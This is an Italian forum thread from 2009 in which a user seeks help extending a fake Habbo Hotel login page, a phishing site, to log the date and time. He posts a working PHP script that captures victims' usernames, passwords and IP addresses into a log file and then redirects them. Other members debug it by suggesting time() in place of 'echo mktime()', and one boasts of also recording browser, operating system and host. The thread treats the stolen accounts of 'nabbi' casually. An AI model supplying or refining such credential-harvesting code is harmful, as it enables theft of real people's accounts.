Problema risolto Data e ora nei fake

foffy100

Nuovo utente
Autore del topic
1 Marzo 2009
11
41
Miglior risposta
0
Salve a tutti vorrei chiedervi una cosa prima sono entrato in un fake login e ho notato questa struttura per leggere le pass:
Nome Habbo: [ciao prova] Password: [ciao prova] IP: [87.10.248.100] Data: 14:44:48 26/04/09

mi potete dare i codici o quello che serve per far si che anche io nel mio fake vedo nome habbo password ma anche data e ora??
:bye:

io nel mio fake creato da me , vedo che sistema operativo usa , che browser usa , che sp cia , a che ora , che giorno , l'host suo , il suo ip , l'habbo hotel .it o altri ecc... ma il codice non lo rilascio !

io nel mio fake creato da me , vedo che sistema operativo usa , che browser usa , che sp cia , a che ora , che giorno , l'host suo , il suo ip , l'habbo hotel .it o altri ecc... ma il codice non lo rilascio !

Vabbe potevi anche dire che nn lo sapevi se poi non me lo vuoi dare...:devil:

E' una funzionalità del php

@Gostracon: Post inutile non trovi? ;S Sono tutte funzionalità del php quelle che hai citato a parte l'hotel che probabilmente lo richiedi attraverso un textbox posizionato opportunamente da te ;)

Edit:

Ecco, leggi questa guida per le date sul php
Perfavore, Entra oppure Registrati per vedere i Link!

{ Ti avviso che devi modificare il " send.php " ;) }

Ciao e benvenuto nel forum xD

E' una funzionalità del php

@Gostracon: Post inutile non trovi? ;S Sono tutte funzionalità del php quelle che hai citato a parte l'hotel che probabilmente lo richiedi attraverso un textbox posizionato opportunamente da te ;)

Edit:

Ecco, leggi questa guida per le date sul php
Perfavore, Entra oppure Registrati per vedere i Link!

{ Ti avviso che devi modificare il " send.php " ;) }

Ciao e benvenuto nel forum xD

Grazie sei stato molto gentile ed esauriente pero io non sono molto pratico di .php quindi ora mmm ti posto una cosa e poi chiedo un altra cosa:

<?php
#nome fake
#mia email
$habbo = $_POST['habbo'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("log.html", "a");
fwrite ($f, 'Nome Habbo: <b>['.$habbo.']</b> Password: <b>['.$password.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: area.html");
?>

poi ho trovato che per la data devo inserire questo codice:

<?php
// stamperà 1111212173
echo time();
?>

forse ho anche sbagliato codice ma anche se fosse giusto non so dove inserirlo mi puoi dare una mano?
Grazie anticipatamente

se sapete le cose ma volete tenervele per voi allora non postate solo per vantarvi
sposto in assistenza tecnica

Non sono molto sicuro ma prova ad inserire nel send.php questo:

$tempo = echo mktime();

quindi il tuo send.php sarà:
PHP:
Perfavore, Entra oppure Registrati per vedere i codici!

Prova e fammi sapere grazie ;)

Non sono molto sicuro ma prova ad inserire nel send.php questo:

$tempo = echo mktime();

quindi il tuo send.php sarà:
PHP:
Perfavore, Entra oppure Registrati per vedere i codici!

Prova e fammi sapere grazie ;)

Ho inserito il tuo file send.php mettendo la mia e-mail e il nome del fake ma quando metto nel sito come nick "a" e password "a" cioè per fare una prova mi esce questo:
Parse error: syntax error, unexpected T_ECHO in /membri/nomesito/send.php on line 7

ho sbagliato qualcosa?

Ho inserito il tuo file send.php mettendo la mia e-mail e il nome del fake ma quando metto nel sito come nick "a" e password "a" cioè per fare una prova mi esce questo:
Parse error: syntax error, unexpected T_ECHO in /membri/nomesito/send.php on line 7

ho sbagliato qualcosa?

Il codice mi sembra giustissimo
Bah

Ragazzi non potete fare qualche prova su qualche vostro fake?
Vi prego è importante per me sapere l'ora...

$tempo = echo mktime(); è sbagliata
credo che echo sia inutile in una dichiarazione di una variabile
inoltre credo che la funzione giusta non sia mktime() ma time()
la guida dice cosi:
time(): è la più semplice di tutte, perchè fornisce il timestamp relativo al momento in cui viene eseguita. Restituisce un intero (timestamp).

quindi prova cosi:
$tempo = time();

Ma cosa ti serve sapere a che ora ti loggano i nabbi?

L'importante è che vedi il nome habbo e la password, poi per il resto non ti serve a gran che.

Grazie a tutti di cuore con i vostri chiarimenti sono riuscito a trovare l'errore ;-)
Potete chiudere.